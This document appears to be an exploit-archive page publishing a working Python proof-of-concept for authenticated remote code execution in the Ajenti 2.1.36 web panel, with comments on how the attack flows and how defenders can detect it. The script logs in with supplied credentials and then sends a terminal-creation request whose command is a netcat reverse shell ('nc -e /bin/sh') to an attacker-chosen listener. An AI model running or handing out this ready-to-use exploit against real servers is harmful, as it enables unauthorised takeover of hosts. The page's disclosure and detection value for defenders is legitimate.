Ajenti 2.1.36 remote code execution (authenticated) Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2020-10-23 |
Type : webapps |
Platform : python
This exploit / vulnerability, Ajenti 2.1.36 remote code execution (authenticated), is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
#!/usr/bin/python3
import requests
import sys
import warnings
from bs4 import BeautifulSoup
import json
# Script body of the published Ajenti 2.1.36 authenticated command-execution PoC.
#
# Flow, as written below:
#   1. POST the supplied account to /api/core/auth on a shared session.
#   2. If the reply echoes the username, POST a JSON document to
#      /api/terminal/create whose "command" field is a netcat callback
#      to the address given on the command line.
#
# Reviewer notes for defenders:
#   * Both requests are made with a valid account, so the exposure is
#     "any panel user can have the server run an arbitrary command through
#     the terminal API". Who holds panel accounts and who can reach the panel
#     over the network are the primary controls.
#   * Detection: a POST to /api/core/auth followed by a POST to
#     /api/terminal/create on the same session, where the body's "command"
#     is not an interactive shell; on the host, the panel's service process
#     spawning `nc` with `-e` (or any outbound-connecting child).
#   * The page names 2.1.36 as the affected version and does not name a
#     fixed release - check the vendor's advisories before assuming a
#     given build is safe.

# bs4 is imported by the file but not used by the code below; the filter
# only silences its UserWarning category.
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')

cli_args = sys.argv
if len(cli_args) < 6:
    print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort")
    exit()

# Positional arguments: panel base URL, account, and the callback address.
base_url, user, secret, listener_ip, listener_port = cli_args[1:6]

# One session object carries the cookie set by the login reply into the
# second request.
http = requests.session()

print("[+] Sendin login request...")
auth_reply = http.post(
    base_url + "/api/core/auth",
    json={
        "username": user,
        "password": secret,
        "mode": "normal",
    },
)

# Success heuristic: the username appears somewhere in the response body.
# Any other reply is reported as bad credentials or a patched target.
if user not in auth_reply.text:
    print("[-] Wrong credentials or may the system patched.")
    exit()

terminal_endpoint = base_url + "/api/terminal/create"

# The request body is serialized by hand and sent as the raw POST data
# (not via the `json=` keyword), exactly as in the published script.
terminal_request = json.dumps({
    'command': 'nc -e /bin/sh ' + listener_ip + ' ' + listener_port,
    'autoclose': True,
})

print("[+] Sending payload...")
# The response is not inspected; the script cannot tell whether the
# command actually ran.
http.post(terminal_endpoint, terminal_request)
print("[+] Check your listener !...")